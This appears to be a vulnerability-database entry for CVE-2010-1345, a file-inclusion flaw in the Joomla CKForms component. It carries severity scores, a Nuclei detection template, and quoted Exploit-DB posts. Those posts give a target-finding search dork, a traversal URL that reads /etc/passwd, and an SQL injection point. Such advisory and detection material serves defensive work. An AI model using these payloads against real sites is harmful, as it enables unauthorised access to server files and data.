CVE-2010-1345
Published 2010-04-09
Priority: P3 · 40 · medium · CVSS 2.0: 5
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 16.87% (96.7th percentile)
Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cookex | com_ckforms | — | — |
No detection rules found.
Exploit-DB
Joomla! Component Cookex Agency CKForms - Local File Inclusion
exploitdb·2010-11-08
---
####################################################################
>>>>> Author : altbta [[email protected]]
>>>>> Home : www.v4-team.com/cc
>>>>> Script : Joomla Component com_ckforms
>>>>> Bug Type : Multiple Vulnerabilities
>>>>> Dork : inurl:"com_ckforms"
http://extensions.joomla.org/extensions/contacts-and-feedback/forms/4939
####################################################################
===[ Exploit ]=== [LFI]
http://site/index.php?option=com_ckforms&controller=[LFI]
http://site.com/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00
####################################################################
RxH & ab0-3th4b
Exploit-DB
Joomla! Component com_ckforms - Multiple Vulnerabilities
exploitdb·2010-03-17
---
####################################################################
>>>>> Author : altbta [[email protected]]
>>>>> Home : www.v4-team.com/cc
>>>>> Script : Joomla Component com_ckforms
>>>>> Bug Type : Multiple Vulnerabilities
>>>>> Dork : inurl:"com_ckforms"
####################################################################
===[ Exploit ]=== [LFI]
http://site/index.php?option=com_ckforms&controller=[LFI]
===[ Exploit ]=== [sql]
http://site/index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=2[sql]
####################################################################
RxH & ab0-3th4b
Nuclei
Joomla! Component Cookex Agency CKForms - Local File Inclusion
nuclei·CVSS 5.0
A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1345
info:
  name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information.
  remediation: Upgrade t
References:
http://packetstormsecurity.org/1003-exploits/joomlackforms-lfisql.txt
http://secunia.com/advisories/38976
http://www.exploit-db.com/exploits/11785
http://www.osvdb.org/63031
Published: 2010-04-09